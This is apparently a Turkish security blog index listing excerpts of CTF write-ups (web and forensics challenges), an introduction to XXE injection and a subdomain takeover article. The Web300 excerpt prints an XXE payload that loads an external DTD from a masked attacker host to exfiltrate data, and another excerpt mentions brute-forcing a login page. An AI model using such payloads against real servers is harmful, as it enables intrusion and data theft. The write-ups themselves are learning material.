17Ankara

Perşembe, 26 Nisan 2018

Sosyal Medya

Sosyal Medya

XML(XXE) İnjections Nedir? Nasıl Yapılır?

Öncelikle merhaba arkadaşlar. Uzun bir aradan Sonra yeni birşey anlatayım dedim. Herkesin duyduğu CTF’lerde soru olarak çıkma ihtimali yüksek bir konu Olan XML İnjections saldırı yönteminden bahsetmek isterim. XXE( XML External Entity) zafiyeti, sunucu(sunucu tarafında çalışan yazılım) XML verisini parse ederken özel olarak tanımlanmış bir XML varlığının (entity) çağırılması sonucu…

Web300

Soru şu şekildeydi: Linke gittiğimizde karşımızda bir register akranı vardı 🙂 XML şeklinde idi. XML‘i gördüğümüz gibi XXE vardır dedik. Collaborator’u açıp PoC yapalım dedik PayloadsAllTheThings işimizi çok kolaylaştırmıştı. <?xml version=”1.0″ ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM “http://xx.xx.xx.xx/dtd.xml”> %sp; %param1; ]> <r>&exfil;</r> dtd.xml‘in içi ise böyle olacaktı <!ENTITY %…

Web200

Sorumuza bakalım 🙂 Siteye girer girmez kaynak koduna bakalım dedik ve Aşağıda kik odu gördük not found <!– /site/ –> hemen site dizinine gidelim dedik. Ve gitttiğimizde blog tarzı bir siteyle karşı karşıyaydık. Siteyi incelediğimizde sahte upload yeri ile footer’da yer alan “`Copyright © PELINCORP – development version: dev kısmı…

Web100

Sırada web alanında ki sorulardan web100 sorusuna bakalım: Soruda link’e gittiğimizde; böyle bir login sayfası geliyordu. Önce kaynak kodlarına bakalım dedik ama kaynak kodlarında birşey bulamadık. Daha sonra ekibimizden Berkay kardeşim Chrome konsolda çalıştırabileceğimiz bir brute force algoritması yazdı. Hepimiz başladık denemeye. Ahmet ise tam sayfayı yenilirken sisteme giriş yapacak…

Forensic500

Sorumuza bir bakalım 🙂 Dosyayı indirmek için tıklayın 🙂 Imaja dalmadan önce verilen eke bakalım dedik (bb3490207fffb173610c724fed93c0eb3368804d) fidye dedigi icin hemen ransomware decoderlara bakalim dedik burasi tam aradigimiz yerdi. Tek tek tüm decoderları deniyelim dedik fakat şanslıydık ki ilk denemede tuttu. Chrysanthemum.jpg adlı dosyayı açınca ise flagımız karşımızdaydı flagimiz DKHOS_{R4nsomWARe_so_h0t_Now}

Forensic400

Soruyu inceleyelim 🙂 Ram imaji oldugunu bildigimiz icin direk volatility araci ile imaja daldik. volatility -f for400.img imageinfo ile alakali profile baktik ~/Downloads$ volatility -f for400.img imageinfo Volatility Foundation Volatility Framework 2.5 INFO : volatility.debug : Determining profile based on KDBG search… Suggested Profile(s) : Win7SP0x86, Win7SP1x86 AS Layer1 : IA32PagedMemoryPae (Kernel AS)…

Forensic300

Sorumuza bakalım 🙂 Soruda dosya analizi yapıp bozuk kısımları düzelterek flag’a ulaşmamız isteniyordu. Dosyaya file ile baktigimizda data diyordu bu yüzden dosyayı hex editor ile açmak durumunda kaldık 00000000 D9 1E BC AF 27 1C 00 04 49 15 DF 99 90 00 00 00 |Ù.¼¯’…I.ß…..| 00000010 00 00 00 00 00…

Forensic200

Öncelikle Sorumuzu Görelim: Dosyaları indirmek için tıklayın Öncelikle bence bu soru yarışmada ki en sıkıntılı sorularadan biriydi. En azından bizim için öyle oldu. Zaten yapamadık. İndirdiimiz Dosyalarda parçalara bölünmüş QR vardı. Bunu nasıl çözeriz diye düşünürken. Aklımıza photosop ile birleştirme fikri geldi ama nasıl birleştireceğimiz hakkında fazla bilgimiz yoktu sonradan…

Forensic100

Bu başlıkta yarışmada ki FORENSIC100 sorusunun cevabını anlattık. Önceliklsorumuza bakalım. Soru: Dosya için tıklayın Dosyayı indirdiğimizde grep ile dosyanin içine baktık. Forensic$ grep -nai “flag” 26b8351bdd03ce6d1d683bc38786aa3ea2432d45.mp4 132: stRef:filePath=”flag.jpg” 132. satırda flag.jpg adlı dosyayı görünce 132. satıra gittik. ———————————————————————————————- <xmpMM:Ingredients> <rdf:Bag> <rdf:li stRef:instanceID=”02d17d1d-c0c1-217d-4084-957400000068″ stRef:documentID=”4b1048e0-b00c-3347-ffa0-80860000003b” stRef:fromPart=”time:0″ stRef:toPart=”time:3984383208960000f254016000000d10160640000f254016000000″ stRef:filePath=”flag.jpg” stRef:maskMarkers=”None”/> <rdf:li stRef:instanceID=”91d02011-6d0d-77cb-990e-54530000006a” stRef:documentID=”5795f2a9-2a50-6d49-2fb8-c9000000003d” stRef:fromPart=”time:0″ stRef:toPart=”time:0d1999766361600000f254016000000″ stRef:filePath=”black.jpg”…

Subdomain Takeover #2

Subdomain Takeover #1 adlı yazımda en çok kullanılan yöntem amazon alt yapısını kullanan sitelere yapılan saldırıdan bahsetmiştim. Şimdi ise çok az kullanılan ama genel olarak hedef siteyi ele alan bir yöntemden bahsedeceğim. Öncelikle ilk aşama olan web uygulama oluşturma platformu “heroku” ya kayıt oluyoruz.Daha sonra bilgisayarımıza herokuyu indiriyoruz. Sisteminiz için…